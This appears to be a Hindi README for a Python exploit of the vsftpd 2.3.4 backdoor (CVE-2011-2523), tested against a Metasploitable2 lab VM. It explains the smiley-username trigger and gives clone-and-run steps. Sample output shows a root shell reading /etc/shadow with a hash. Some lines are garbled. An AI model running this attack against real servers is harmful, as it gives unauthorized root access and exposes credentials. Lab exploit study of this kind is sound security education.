
Python में शुरुआत से एक्सप्लॉइट डेवलपमेंट। कोई Metasploit नहीं। कोई फ्रेमवर्क नहीं। अधिकृत लैब टारगेट्स के विरुद्ध वास्तविक CVE का रॉ सॉकेट-स्तरीय कार्यान्वयन।
vsftpd (Very Secure FTP Daemon) Unix-जैसे प्लेटफ़ॉर्म्स के लिए एक FTP सर्वर है, जिसमें Linux शामिल है, और यह GNU General Public License के अंतर्गत वितरित किया जाता है।
जुलाई 2011 में, यह पता चला कि vsftpd संस्करण 2.3.4 — जो 30 जून से 3 जुलाई, 2011 के बीच डाउनलोड के लिए उपलब्ध था — से छेड़छाड़ की गई थी। एक अज्ञात हमलावर ने vsftpd वितरण सर्वर तक पहुँच प्राप्त की और उपयोगकर्ताओं को भेजे जाने से पहले स्रोत कोड में सीधे एक बैकडोर इंजेक्ट कर दिया।
यह vsftpd के डिज़ाइन में कोई बग नहीं था। यह एक सप्लाई चेन अटैक था — वैध सॉफ़्टवेयर को दुर्भावनापूर्ण रूप से संशोधित संस्करण से बदल दिया गया था।
इंजेक्ट किया गया बैकडोर कोड लॉगिन के दौरान FTP उपयोगकर्ता नाम फ़ील्ड की निगरानी करता है।
यदि उपयोगकर्ता नाम में :) (एक स्माइली फ़ेस) शामिल है, तो बैकडोर लक्ष्य मशीन पर
spawn करता है — बिना किसी प्रमाणीकरण की आवश्यकता के।
हमला प्रवाह:
Attacker → port 21 (FTP) → sends USER containing :) → backdoor triggers → root shell opens on port 6200
Attacker → port 6200 → full interactive root shell
CWE वर्गीकरण: CWE-78 — Improper Neutralization of Special Elements used in an OS Command (OS Command Injection)
यह एक्सप्लॉइट शुरू से शुद्ध Python में केवल मानक लाइब्रेरी (socket) का उपयोग करके
लिखा गया है। कोई Metasploit नहीं। कोई एक्सप्लॉइट फ़्रेमवर्क नहीं। कोई बाहरी
निर्भरता नहीं।
चरण दर चरण:
:) युक्त दुर्भावनापूर्ण FTP उपयोगकर्ता नाम भेजता है# Clone the repo
git clone https://github.com/rushikesh-a-bhujbal/CVE-2011-2523.git
cd CVE-2011-2523
# Set your target IP inside main.py
target_ip = "YOUR_METASPLOITABLE2_IP"
# Run
python3 main.py
उदाहरण आउटपुट:
[+] Vulnerable version confirmed. Proceeding...
[+] Backdoor triggered. Opening shell on port 6200...
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
cat /etc/shadow
root:
1
1/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
exit
| परिदृश्य | व्यवहार |
|---|---|
| पोर्ट 21 बंद | "Port is closed" प्रिंट करता है, साफ़-सुथरे ढंग से बाहर निकल जाता है |
| कनेक्शन टाइमआउट | "Connection timed out" प्रिंट करता है, साफ़-सुथरे ढंग से बाहर निकल जाता है |
| अमान्य होस्टनाम/IP | "Invalid target" प्रिंट करता है, साफ़-सुथरे ढंग से बाहर निकल जाता है |
| गलत vsftpd संस्करण | बेमेल संदेश प्रिंट करता है, साफ़-सुथरे ढंग से बाहर निकल जाता है |
| पोर्ट 6200 अगम्य | बैकडोर विफलता संदेश प्रिंट करता है, साफ़-सुथरे ढंग से बाहर निकल जाता है |
यह एक्सप्लॉइट पूर्णतः शैक्षिक उद्देश्यों और केवल अधिकृत सुरक्षा अनुसंधान के लिए विकसित किया गया है।
पूरी तरह से पृथक लैब वातावरण में केवल स्थानीय Metasploitable2 वर्चुअल मशीन के विरुद्ध बनाया और परीक्षण किया गया।
इसका उपयोग किसी भी ऐसे सिस्टम के विरुद्ध न करें जो आपका न हो या जिसके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति न हो। अनधिकृत उपयोग Computer Fraud and Abuse Act (CFAA) और दुनिया भर के समकक्ष कानूनों के अंतर्गत अवैध है।
लेखक इस कोड के दुरुपयोग की कोई ज़िम्मेदारी स्वीकार नहीं करता।
Rushikesh Bhujbal
Security Research & Exploit Development
GitHub